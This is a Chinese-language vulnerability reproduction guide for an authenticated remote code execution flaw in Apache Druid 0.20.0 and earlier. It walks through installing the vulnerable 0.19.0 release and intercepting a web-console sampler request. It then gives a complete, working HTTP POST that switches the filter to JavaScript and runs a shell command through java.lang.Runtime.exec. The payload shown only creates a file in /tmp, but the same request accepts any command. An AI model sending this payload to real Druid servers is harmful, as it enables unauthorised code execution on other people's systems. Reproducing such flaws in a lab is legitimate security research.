Apache Druid是一个高性能实时分析数据库。它是为大型数据集上实时探索查询的引擎,提供专为OLAP 设计的开源分析数据存储系统。
Apache Druid 0.20.0及之前版本存在远程代码执行漏洞。经过身份认证的攻击者可通过发送特制请求提交JavaScript代码,利用该漏洞在目标系统执行任意代码。

Druid环境搭建

下载Druid

官方目前提供下载的存在漏洞的版本为0.19,下载链接为https://mirrors.ustc.edu.cn/apache/druid/0.19.0/apache-druid-0.19.0-bin.tar.gz.

环境依赖

  • Linux/macOS/类Unix系统
  • Java 8: 8u92+
  • Java11环境也可以运行,但需要关闭druid的java版本检查操作

Druid运行

  1. 解压apache-druid-0.19.0-bin.tar.gz

    1
    tar xvfz apache-druid-0.19.0-bin.tar.gz
  2. 如果运行环境为java11,设置DRUID_SKIP_JAVA_CHECK环境变量,跳过JAVA版本检测

    1
    export DRUID_SKIP_JAVA_CHECK=1
  3. 运行bin/start-micro-quickstart

    1
    ./bin/start-micro-quickstart

start

漏洞复现

  1. 访问hxxp://IP:8888,选择【Load data】,【Local disk】,【Connect data】:

    druid1

  2. 输入Base directory为quickstart/tutorial/,然后点击【Apply】和【Next: Parse data】

    druid2

  3. 点击【filter】,【Add column filter】

    druid3

  4. 打开抓包工具开始抓包,输入filter内容并Apply

    druid4
  5. 查看抓包内容如下:

    druid5

    注意红色圈起来的部分,就是filter的内容,也是漏洞利用的注入点。

  6. 修改抓包报文,将filter type修改为JavaScript,并注入恶意JS脚本代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    POST /druid/indexer/v1/sampler?for=filter HTTP/1.1
    Host: XXXX:8888
    Connection: keep-alive
    Content-Length: 2830
    Accept: application/json, text/plain, */*
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36
    Content-Type: application/json;charset=UTF-8
    Origin: http://XXXX:8888
    Referer: http://XXXX:8888/unified-console.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7

    {"type":"index","spec":{"ioConfig":{"type":"index","inputSource":{"type":"inline","data":"{\"timestamp\":\"2018-01-01T07:01:35Z\",\"animal\":\"octopus\",\"number\":115}\n{\"timestamp\":\"2018-01-01T05:01:35Z\",\"animal\":\"mongoose\",\"number\":737}\n{\"timestamp\":\"2018-01-01T06:01:35Z\",\"animal\":\"snake\",\"number\":1234}\n{\"timestamp\":\"2018-01-01T01:01:35Z\",\"animal\":\"lion\",\"number\":300}\n{\"timestamp\":\"2018-01-01T01:01:35Z\",\"srcIP\":\"1.1.1.1\",\"dstIP\":\"2.2.2.2\",\"packets\":20,\"bytes\":9024}\n{\"timestamp\":\"2018-01-01T01:01:51Z\",\"srcIP\":\"1.1.1.1\",\"dstIP\":\"2.2.2.2\",\"packets\":255,\"bytes\":21133}\n{\"timestamp\":\"2018-01-01T01:01:59Z\",\"srcIP\":\"1.1.1.1\",\"dstIP\":\"2.2.2.2\",\"packets\":11,\"bytes\":5780}\n{\"timestamp\":\"2018-01-01T01:02:14Z\",\"srcIP\":\"1.1.1.1\",\"dstIP\":\"2.2.2.2\",\"packets\":38,\"bytes\":6289}\n{\"timestamp\":\"2018-01-01T01:02:29Z\",\"srcIP\":\"1.1.1.1\",\"dstIP\":\"2.2.2.2\",\"packets\":377,\"bytes\":359971}\n{\"timestamp\":\"2018-01-01T01:03:29Z\",\"srcIP\":\"1.1.1.1\",\"dstIP\":\"2.2.2.2\",\"packets\":49,\"bytes\":10204}\n{\"timestamp\":\"2018-01-02T21:33:14Z\",\"srcIP\":\"7.7.7.7\",\"dstIP\":\"8.8.8.8\",\"packets\":38,\"bytes\":6289}\n{\"timestamp\":\"2018-01-02T21:33:45Z\",\"srcIP\":\"7.7.7.7\",\"dstIP\":\"8.8.8.8\",\"packets\":123,\"bytes\":93999}\n{\"timestamp\":\"2018-01-02T21:35:45Z\",\"srcIP\":\"7.7.7.7\",\"dstIP\":\"8.8.8.8\",\"packets\":12,\"bytes\":2818}\n{\"timestamp\":\"2018-01-01T04:01:35Z\",\"animal\":\"bear\",\"number\":222}\n{\"timestamp\":\"2018-01-01T09:01:35Z\",\"animal\":\"falcon\",\"number\":1241}\n{\"timestamp\":\"2018-01-01T07:01:35Z\",\"animal\":\"octopus\",\"location\":1,\"number\":100}\n{\"timestamp\":\"2018-01-01T05:01:35Z\",\"animal\":\"mongoose\",\"location\":2,\"number\":200}\n{\"timestamp\":\"2018-01-01T06:01:35Z\",\"animal\":\"snake\",\"location\":3,\"number\":300}\n{\"timestamp\":\"2018-01-01T01:01:35Z\",\"animal\":\"lion\",\"location\":4,\"number\":300}\n{\"time\":\"2015-09-12T00:46:58.771Z\",\"channel\":\"#en.wikipedia\",\"cityName\":null,\"comment\":\"added project\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":false,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Talk\",\"page\":\"Talk:Oswald Tilghman\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"GELongstreet\",\"delta\":36,\"added\":36,\"deleted\":0}"},"inputFormat":{"type":"json","keepNullColumns":true}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"1970-01-01T00:00:00Z"},"dimensionsSpec":{},"transformSpec":{"transforms":[],"filter":{"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('touch /tmp/cve_2021_25646_by_sayers')}", "": {"enabled": true}}}},"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}
  7. 向druid发送攻击报文,查看后台,JS代码中注入的touch命令被成功执行:

    druid7